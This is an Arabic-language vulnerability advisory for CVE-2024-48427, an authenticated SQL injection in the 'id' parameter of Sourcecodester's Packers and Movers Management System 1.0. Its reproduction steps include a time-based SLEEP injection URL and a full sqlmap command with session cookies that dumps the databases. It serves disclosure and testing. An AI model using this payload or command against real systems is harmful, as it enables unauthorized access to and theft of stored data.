CVE-2024-48427
الوصف
ثغرة حقن SQL في Packers and Movers Management System من Sourcecodester الإصدار 1.0 تسمح للمستخدمين المصادق عليهم عن بُعد بتنفيذ أوامر SQL عشوائية عبر معامل id في /mpms/admin/?page=services/manage_service&id
نوع الثغرة
SQL Injection
بائع المنتج
Sourcecodester
قاعدة كود المنتج المتأثر:
https://www.sourcecodester.com/php/15360/packers-and-movers-management-system-phpoop-free-source-code.html - 1.0
المكوّن المتأثر:
معامل id الخاص بتحديث تفاصيل الخدمة في /mpms/admin/?page=services/manage_service&id
نواقل الهجوم:
- قم بإعداد التطبيق محليًا وسجّل الدخول إلى لوحة الإدارة باستخدام بيانات الاعتماد الافتراضية المتوفرة.
- انتقل إلى الصفحة المعرضة للخطر: http://localhost/mpms/admin/?page=services/manage_service&id=2
- احقن حمولة SQL في معامل id: http://localhost/mpms/admin/?page=services/manage_service&id=1' OR SLEEP(5)-- puNr
- راقب استجابة التطبيق: يجب أن تستغرق الصفحة وقتًا أطول بشكل ملحوظ (5 ثوانٍ) للتحميل إذا كان الحقن ناجحًا، مما يؤكد أن معامل id معرض لحقن SQL.
- الآن قم بتشغيل أداة SQLMap لتفريغ تفاصيل قاعدة البيانات:
- sqlmap -u "http://localhost/mpms/admin/?page=services/manage_service&id=1" --cookie="phpMyAdmin=ju34bd3d8q0jdf6td4ntqscaqd;PHPSESSID=eopn8q1p8c1f5m1v5igjoir8k1;" --dbms mysql -p id --risk 3 --level 4 --dbs --dump
المراجع:
- https://owasp.org/www-community/attacks/SQL_Injection
- https://portswigger.net/web-security/sql-injection